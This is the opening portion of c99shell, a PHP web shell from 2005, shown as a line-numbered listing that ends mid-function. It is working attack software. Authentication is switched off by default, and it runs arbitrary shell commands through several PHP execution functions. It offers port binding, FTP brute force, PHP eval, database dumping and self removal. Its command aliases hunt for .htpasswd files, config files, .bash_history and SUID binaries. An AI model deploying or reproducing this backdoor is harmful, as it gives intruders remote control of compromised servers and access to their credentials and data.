1. <?php
  2.  
  3. //Starting calls
  4. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  5. error_reporting(5);
  6. @ignore_user_abort(true);
  7. @set_magic_quotes_runtime(0);
  8. @set_time_limit(0);
  9. $win = strtolower(substr(PHP_OS, 0, 3)) == "win";
  10. if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
  11. define("starttime",getmicrotime());
  12. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  13. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  14. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  15.  
  16. $shver = "1.0 beta (21.05.2005)"; //Current version
  17. //CONFIGURATION AND SETTINGS
  18. if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
  19. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
  20. else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
  21. }
  22.  
  23. $surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
  24.  
  25. if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  26. if (empty($surl))
  27. {
  28. $surl = "?".$includestr; //Self url
  29. }
  30. $surl = htmlspecialchars($surl);
  31.  
  32. $timelimit = 60; //limit of execution this script (seconds), 0 = unlimited.
  33.  
  34. //Authentication
  35.  
  36. $login = "c99"; //login
  37. //DON'T FORGOT ABOUT CHANGE PASSWORD!!!
  38. $pass = "c99"; //password
  39. $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  40.  
  41. /*COMMENT IT FOR TURN ON AUTHENTIFICATION >>>*/ $login = false; //turn off authentification
  42.  
  43. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  44. $login_txt = "Restricted area"; //http-auth message.
  45. $accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
  46.  
  47. $autoupdate = false; //Automatic updating?
  48. $updatenow = false; //If true, update now
  49. $c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
  50.  
  51. $filestealth = false; //if true, don't change modify&access-time
  52.  
  53. $donated_html = "<center><b>GaRDeNFoX</b></center>";
  54. /* If you publish free shell and you wish
  55. add link to your site or any other information,
  56. put here your html. */
  57. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  58.  
  59. $curdir = "./"; //start directory
  60. //$curdir = getenv("DOCUMENT_ROOT");
  61. $tmpdir = ""; //Directory for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  62. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  63.  
  64. $log_email = "user@host.tld"; //Default e-mail for sending logs
  65.  
  66. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  67. $sort_save = true; //If true then save sorting-type.
  68.  
  69. // Registered file-types.
  70. // array(
  71. // "{action1}"=>array("ext1","ext2","ext3",...),
  72. // "{action2}"=>array("ext4","ext5","ext6",...),
  73. // ...
  74. // )
  75. $ftypes = array(
  76. "html"=>array("html","htm","shtml"),
  77. "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  78. "exe"=>array("sh","install","bat","cmd"),
  79. "ini"=>array("ini","inf"),
  80. "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  81. "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  82. "sdb"=>array("sdb"),
  83. "phpsess"=>array("sess"),
  84. "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  85. );
  86.  
  87. // Registered executable file-types.
  88. // array(
  89. // string "command{i}"=>array("ext1","ext2","ext3",...),
  90. // ...
  91. // )
  92. // {command}: %f% = filename
  93. $exeftypes = array(
  94. getenv("PHPRC")." %f%"=>array("php","php3","php4"),
  95. );
  96.  
  97. /* Highlighted files.
  98.   array(
  99.   i=>array({regexp},{type},{opentag},{closetag},{break})
  100.   ...
  101.   )
  102.   string {regexp} - regular exp.
  103.   int {type}:
  104. 0 - files and folders (as default),
  105. 1 - files only, 2 - folders only
  106.   string {opentag} - open html-tag, e.g. "<b>" (default)
  107.   string {closetag} - close html-tag, e.g. "</b>" (default)
  108.   bool {break} - if true and found match then break
  109. */
  110. $regxp_highlight = array(
  111. array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  112. array("config.php",1) // example
  113. );
  114.  
  115. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  116. // array (i=>{letter} ...); string {letter} - letter of a drive
  117. // Set as false or for turn off.
  118. $hexdump_lines = 8; // lines in hex preview file
  119. $hexdump_rows = 24; // 16, 24 or 32 bytes in one line
  120.  
  121. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  122.  
  123. $bindport_pass = "c99"; // default password for binding
  124. $bindport_port = "11457"; // default port for binding
  125.  
  126. // Command-aliases
  127. if (!$win)
  128. {
  129. $cmdaliases = array(
  130. array("-----------------------------------------------------------", "ls -la"),
  131. array("find all suid files", "find / -type f -perm -04000 -ls"),
  132. array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  133. array("find all sgid files", "find / -type f -perm -02000 -ls"),
  134. array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  135. array("find config.inc.php files", "find / -type f -name config.inc.php"),
  136. array("find config* files", "find / -type f -name \"config*\""),
  137. array("find config* files in current dir", "find . -type f -name \"config*\""),
  138. array("find all writable directories and files", "find / -perm -2 -ls"),
  139. array("find all writable directories and files in current dir", "find . -perm -2 -ls"),
  140. array("find all service.pwd files", "find / -type f -name service.pwd"),
  141. array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  142. array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  143. array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  144. array("find all .bash_history files", "find / -type f -name .bash_history"),
  145. array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  146. array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  147. array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  148. array("list file attributes on a Linux second extended file system", "lsattr -va"),
  149. array("show opened ports", "netstat -an | grep -i listen")
  150. );
  151. }
  152. else
  153. {
  154. $cmdaliases = array(
  155. array("-----------------------------------------------------------", "dir"),
  156. array("show opened ports", "netstat -an")
  157. );
  158. }
  159.  
  160. $sess_cookie = "c99shvars"; // Cookie-variable name
  161.  
  162. $usefsbuff = true; //Buffer-function
  163. $copy_unset = false; //Remove copied files from buffer after pasting
  164.  
  165. //Quick launch
  166. $quicklaunch = array(
  167. array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  168. array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  169. array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  170. array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  171. array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  172. array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  173. array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  174. array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
  175. array("<b>Bind</b>",$surl."act=bind&d=%d"),
  176. array("<b>Proc.</b>",$surl."act=ps_aux&d=%d"),
  177. array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
  178. array("<b>Sec.</b>",$surl."act=security&d=%d"),
  179. array("<b>SQL</b>",$surl."act=sql&d=%d"),
  180. array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
  181. array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
  182. array("<b>Self remove</b>",$surl."act=selfremove"),
  183. array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
  184. );
  185.  
  186. //Highlight-code colors
  187. $highlight_background = "#c0c0c0";
  188. $highlight_bg = "#FFFFFF";
  189. $highlight_comment = "#6A6A6A";
  190. $highlight_default = "#0000BB";
  191. $highlight_html = "#1300FF";
  192. $highlight_keyword = "#007700";
  193. $highlight_string = "#000000";
  194.  
  195. @$f = $_REQUEST["f"];
  196. @extract($_REQUEST["c99shcook"]);
  197.  
  198. //END CONFIGURATION
  199.  
  200.  
  201. // \/ Next code isn't for editing \/
  202. $tmp = array();
  203. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  204. $s = "!^(".implode("|",$tmp).")$!i";
  205. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  206. if ($login)
  207. {
  208. if(empty($md5_pass)) {$md5_pass = md5($pass);}
  209. if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  210. {
  211. if ($login_txt === false) {$login_txt = "";}
  212. elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  213. header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  214. header("HTTP/1.0 401 Unauthorized");
  215. exit($accessdeniedmess);
  216. }
  217. }
  218. if ($act != "img")
  219. {
  220. $lastdir = realpath(".");
  221. chdir($curdir);
  222. if (($selfwrite) or ($updatenow))
  223. {
  224. if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
  225. c99sh_getupdate();
  226. $data = file_get_contents($c99sh_updatefurl);
  227. $fp = fopen($data,"w");
  228. fwrite($fp,$data);
  229. fclose($fp);
  230. exit;
  231. }
  232. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  233. if (!is_array($sess_data)) {$sess_data = array();}
  234. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  235. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  236.  
  237. if (!function_exists("c99_buff_prepare"))
  238. {
  239. function c99_buff_prepare()
  240. {
  241. global $sess_data;
  242. global $act;
  243. foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  244. foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  245. $sess_data["copy"] = array_unique($sess_data["copy"]);
  246. $sess_data["cut"] = array_unique($sess_data["cut"]);
  247. sort($sess_data["copy"]);
  248. sort($sess_data["cut"]);
  249. if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  250. else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  251. }
  252. }
  253. c99_buff_prepare();
  254. if (!function_exists("c99_sess_put"))
  255. {
  256. function c99_sess_put($data)
  257. {
  258. global $sess_cookie;
  259. global $sess_data;
  260. c99_buff_prepare();
  261. $sess_data = $data;
  262. $data = serialize($data);
  263. setcookie($sess_cookie,$data);
  264. }
  265. }
  266. if ($sort_save)
  267. {
  268. if (!empty($sort)) {setcookie("sort",$sort);}
  269. if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  270. }
  271. if (!function_exists("str2mini"))
  272. {
  273. function str2mini($content,$len)
  274. {
  275. if (strlen($content) > $len)
  276. {
  277. $len = ceil($len/2) - 2;
  278. return substr($content, 0, $len)."...".substr($content, -$len);
  279. }
  280. else {return $content;}
  281. }
  282. }
  283. if (!function_exists("view_size"))
  284. {
  285. function view_size($size)
  286. {
  287. if (!is_numeric($size)) {return false;}
  288. else
  289. {
  290. if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  291. elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  292. elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  293. else {$size = $size . " B";}
  294. return $size;
  295. }
  296. }
  297. }
  298. if (!function_exists("fs_copy_dir"))
  299. {
  300. function fs_copy_dir($d,$t)
  301. {
  302. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  303. if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  304. $h = opendir($d);
  305. while (($o = readdir($h)) !== false)
  306. {
  307. if (($o != ".") and ($o != ".."))
  308. {
  309. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  310. else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  311. if (!$ret) {return $ret;}
  312. }
  313. }
  314. closedir($h);
  315. return true;
  316. }
  317. }
  318. if (!function_exists("fs_copy_obj"))
  319. {
  320. function fs_copy_obj($d,$t)
  321. {
  322. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  323. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  324. if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  325. if (is_dir($d))
  326. {
  327. if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  328. if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  329. return fs_copy_dir($d,$t);
  330. }
  331. elseif (is_file($d)) {return copy($d,$t);}
  332. else {return false;}
  333. }
  334. }
  335. if (!function_exists("fs_move_dir"))
  336. {
  337. function fs_move_dir($d,$t)
  338. {
  339. $h = opendir($d);
  340. if (!is_dir($t)) {mkdir($t);}
  341. while (($o = readdir($h)) !== false)
  342. {
  343. if (($o != ".") and ($o != ".."))
  344. {
  345. $ret = true;
  346. if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  347. else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
  348. if (!$ret) {return $ret;}
  349. }
  350. }
  351. closedir($h);
  352. return true;
  353. }
  354. }
  355. if (!function_exists("fs_move_obj"))
  356. {
  357. function fs_move_obj($d,$t)
  358. {
  359. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  360. $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  361. if (is_dir($d))
  362. {
  363. if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  364. if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  365. return fs_move_dir($d,$t);
  366. }
  367. elseif (is_file($d))
  368. {
  369. if(copy($d,$t)) {return unlink($d);}
  370. else {unlink($t); return false;}
  371. }
  372. else {return false;}
  373. }
  374. }
  375. if (!function_exists("fs_rmdir"))
  376. {
  377. function fs_rmdir($d)
  378. {
  379. $h = opendir($d);
  380. while (($o = readdir($h)) !== false)
  381. {
  382. if (($o != ".") and ($o != ".."))
  383. {
  384. if (!is_dir($d.$o)) {unlink($d.$o);}
  385. else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  386. }
  387. }
  388. closedir($h);
  389. rmdir($d);
  390. return !is_dir($d);
  391. }
  392. }
  393. if (!function_exists("fs_rmobj"))
  394. {
  395. function fs_rmobj($o)
  396. {
  397. $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  398. if (is_dir($o))
  399. {
  400. if (substr($o,-1,1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  401. return fs_rmdir($o);
  402. }
  403. elseif (is_file($o)) {return unlink($o);}
  404. else {return false;}
  405. }
  406. }
  407. if (!function_exists("myshellexec"))
  408. {
  409. function myshellexec($cmd)
  410. {
  411. $result = "";
  412. if (!empty($cmd))
  413. {
  414. if (is_callable("exec")) {exec($cmd,$result); $result = join("\n",$result);}
  415. elseif (is_callable("shell_exec")) {$result = shell_exec($cmd);}
  416. elseif (is_callable("system")) {@ob_start(); system($cmd); $result = @ob_get_contents(); @ob_end_clean();}
  417. elseif (is_callable("passthru")) {@ob_start(); passthru($cmd); $result = @ob_get_contents(); @ob_end_clean();}
  418. elseif (($result = `$cmd`) !== false) {}
  419. elseif (is_resource($fp = popen($cmd,"r")))
  420. {
  421. $result = "";
  422. while(!feof($fp)) {$result .= fread($fp,1024);}
  423. pclose($fp);
  424. }
  425. }
  426. return $result;
  427. }
  428. }
  429. if (!function_exists("tabsort"))
  430. {
  431. function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
  432. }
  433. if (!function_exists("view_perms"))
  434. {
  435. function view_perms($mode)
  436. {
  437. if (($mode & 0xC000) === 0xC000) {$type = "s";}
  438. elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  439. elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  440. elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  441. elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  442. elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  443. elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  444. else {$type = "?";}
  445.  
  446. $owner["read"] = ($mode & 00400) ? "r" : "-";
  447. $owner["write"] = ($mode & 00200) ? "w" : "-";
  448. $owner["execute"] = ($mode & 00100) ? "x" : "-";
  449. $group["read"] = ($mode & 00040) ? "r" : "-";
  450. $group["write"] = ($mode & 00020) ? "w" : "-";
  451. $group["execute"] = ($mode & 00010) ? "x" : "-";
  452. $world["read"] = ($mode & 00004) ? "r" : "-";
  453. $world["write"] = ($mode & 00002) ? "w" : "-";
  454. $world["execute"] = ($mode & 00001) ? "x" : "-";
  455.  
  456. if( $mode & 0x800 ) {$owner["execute"] = ($owner["execute"] == "x") ? "s" : "S";}
  457. if( $mode & 0x400 ) {$group["execute"] = ($group["execute"] == "x") ? "s" : "S";}
  458. if( $mode & 0x200 ) {$world["execute"] = ($world["execute"] == "x") ? "t" : "T";}
  459.  
  460. return $type.$owner["read"].$owner["write"].$owner["execute"].
  461. $group["read"].$group["write"].$group["execute"].
  462. $world["read"].$world["write"].$world["execute"];
  463. }
  464. }
  465. if (!function_exists("parse_perms"))
  466. {
  467. function parse_perms($mode)
  468. {
  469. if (($mode & 0xC000) === 0xC000) {$t = "s";}
  470. elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  471. elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  472. elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  473. elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  474. elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  475. elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  476. else {$t = "?";}
  477. $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  478. $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  479. $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  480. return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  481. }
  482. }
  483. if (!function_exists("view_perms_color"))
  484. {
  485. function view_perms_color($o)
  486. {
  487. if (!is_readable($o)) {return "<font color=\"red\">".view_perms(fileperms($o))."</font>";}
  488. elseif (!is_writable($o)) {return "<font color=\"white\">".view_perms(fileperms($o))."</font>";}
  489. else {return "<font color=\"green\">".view_perms(fileperms($o))."</font>";}
  490. }
  491. }
  492. if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
  493. if (!function_exists("c99sh_getupdate"))
  494. {
  495. function c99sh_getupdate()
  496. {
  497. global $updatenow;
  498. $data = @file_get_contents($c99sh_updatefurl."?version=".$shver."&");
  499. if (!$data) {echo "Can't fetch update-information!";}
  500. else
  501. {
  502. $data = unserialize(base64_decode($data));
  503. if (!is_array($data)) {echo "Corrupted update-information!";}
  504. elseif ($shver < $data["cur"]) {$updatenow = true;}
  505. }
  506. }
  507. }
  508. if (!function_exists("mysql_dump"))
  509. {
  510. function mysql_dump($set)
  511. {
  512. global $shver;
  513. $sock = $set["sock"];
  514. $db = $set["db"];
  515. $print = $set["print"];
  516. $nl2br = $set["nl2br"];
  517. $file = $set["file"];
  518. $add_drop = $set["add_drop"];
  519. $tabs = $set["tabs"];
  520. $onlytabs = $set["onlytabs"];
  521. $ret = array();
  522. $ret["err"] = array();
  523. if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  524. if (empty($db)) {$db = "db";}
  525. if (empty($print)) {$print = 0;}
  526. if (empty($nl2br)) {$nl2br = 0;}
  527. if (empty($add_drop)) {$add_drop = true;}
  528. if (empty($file))
  529. {
  530. global $win;
  531. if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  532. else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
  533. }
  534. if (!is_array($tabs)) {$tabs = array();}
  535. if (empty($add_drop)) {$add_drop = true;}
  536. if (sizeof($tabs) == 0)
  537. {
  538. // retrive tables-list
  539. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  540. if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  541. }
  542. $SERVER_ADDR = getenv("SERVER_ADDR");
  543. $SERVER_NAME = getenv("SERVER_NAME");
  544. $out = "# Dumped by C99Shell.SQL v. ".$shver."
  545. # Home page: http://ccteam.ru
  546. #
  547. # Host settings:
  548. # MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
  549. # Date: ".date("d.m.Y H:i:s")."
  550. # ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
  551. #---------------------------------------------------------
  552. ";
  553. $c = count($onlytabs);
  554. foreach($tabs as $tab)
  555. {
  556. if ((in_array($tab,$onlytabs)) or (!$c))
  557. {
  558. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  559. // recieve query for create table structure
  560. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  561. if (!$res) {$ret["err"][] = mysql_smarterror();}
  562. else
  563. {
  564. $row = mysql_fetch_row($res);
  565. $out .= $row["1"].";\n\n";
  566. // recieve table variables
  567. $res = mysql_query("SELECT * FROM `$tab`", $sock);
  568. if (mysql_num_rows($res) > 0)
  569. {
  570. while ($row = mysql_fetch_assoc($res))
  571. {
  572. $keys = implode("`, `", array_keys($row));
  573. $values = array_values($row);
  574. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  575. $values = implode("', '", $values);
  576. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  577. $out .= $sql;
  578. }
  579. }
  580. }
  581. }
  582. }
  583. $out .= "#---------------------------------------------------------------------------------\n\n";
  584. if ($file)
  585. {
  586. $fp = fopen($file, "w");
  587. if (!$fp) {$ret["err"][] = 2;}
  588. else
  589. {
  590. fwrite ($fp, $out);
  591. fclose ($fp);
  592. }
  593. }
  594. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  595. return $out;
  596. }
  597. }
  598. if (!function_exists("mysql_buildwhere"))
  599. {
  600. function mysql_buildwhere($array,$sep=" and",$functs=array())
  601. {
  602. if (!is_array($array)) {$array = array();}
  603. $result = "";
  604. foreach($array as $k=>$v)
  605. {
  606. $value = "";
  607. if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  608. $value .= "'".addslashes($v)."'";
  609. if (!empty($functs[$k])) {$value .= ")";}
  610. $result .= "`".$k."` = ".$value.$sep;
  611. }
  612. $result = substr($result,0,strlen($result)-strlen($sep));
  613. return $result;
  614. }
  615. }
  616. if (!function_exists("mysql_fetch_all"))
  617. {
  618. function mysql_fetch_all($query,$sock)
  619. {
  620. if ($sock) {$result = mysql_query($query,$sock);}
  621. else {$result = mysql_query($query);}
  622. $array = array();
  623. while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  624. mysql_free_result($result);
  625. return $array;
  626. }
  627. }
  628. if (!function_exists("mysql_smarterror"))
  629. {
  630. function mysql_smarterror($type,$sock)
  631. {
  632. if ($sock) {$error = mysql_error($sock);}
  633. else {$error = mysql_error();}
  634. $error = htmlspecialchars($error);
  635. return $error;
  636. }
  637. }
  638. if (!function_exists("mysql_query_form"))
  639. {
  640. function mysql_query_form()
  641. {
  642. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  643. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  644. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  645. if ((!$submit) or ($sql_act))
  646. {
  647. echo "<table border=0><tr><td><form action=\"".$sql_surl."\" name=\"c99sh_sqlquery\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td>";
  648. if ($tbl_struct)
  649. {
  650. echo "<td valign=\"top\"><b>Fields:</b><br>";
  651. foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  652. echo "</td></tr></table>";
  653. }
  654. }
  655. if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  656. }
  657. }
  658. if (!function_exists("mysql_create_db"))
  659. {
  660. function mysql_create_db($db,$sock="")
  661. {
  662. $sql = "CREATE DATABASE `".addslashes($db)."`;";
  663. if ($sock) {return mysql_query($sql,$sock);}
  664. else {return mysql_query($sql);}
  665. }
  666. }
  667. if (!function_exists("mysql_query_parse"))
  668. {
  669. function mysql_query_parse($query)
  670. {
  671. $query = trim($query);
  672. $arr = explode (" ",$query);
  673. /*array array()
  674.  {
  675.   "METHOD"=>array(output_type),
  676.   "METHOD1"...
  677.   ...
  678.  }
  679.  if output_type == 0, no output,
  680.  if output_type == 1, no output if no error
  681.  if output_type == 2, output without control-buttons
  682.  if output_type == 3, output with control-buttons
  683.  */
  684. $types = array(
  685. "SELECT"=>array(3,1),
  686. "SHOW"=>array(2,1),
  687. "DELETE"=>array(1),
  688. "DROP"=>array(1)
  689. );
  690. $result = array();
  691. $op = strtoupper($arr[0]);
  692. if (is_array($types[$op]))
  693. {
  694. $result["propertions"] = $types[$op];
  695. $result["query"] = $query;
  696. if ($types[$op] == 2)
  697. {
  698. foreach($arr as $k=>$v)
  699. {
  700. if (strtoupper($v) == "LIMIT")
  701. {
  702. $result["limit"] = $arr[$k+1];
  703. $result["limit"] = explode(",",$result["limit"]);
  704. if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  705. unset($arr[$k],$arr[$k+1]);
  706. }
  707. }
  708. }
  709. }
  710. else {return false;}
  711. }
  712. }
  713. if (!function_exists("c99fsearch"))
  714. {
  715. function c99fsearch($d)
  716. {
  717. global $found;
  718. global $found_d;
  719. global $found_f;
  720. global $search_i_f;
  721. global $search_i_d;
  722. global $a;
  723. if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  724. $h = opendir($d);
  725. while (($f = readdir($h)) !== false)
  726. {
  727. if($f != "." && $f != "..")
  728. {
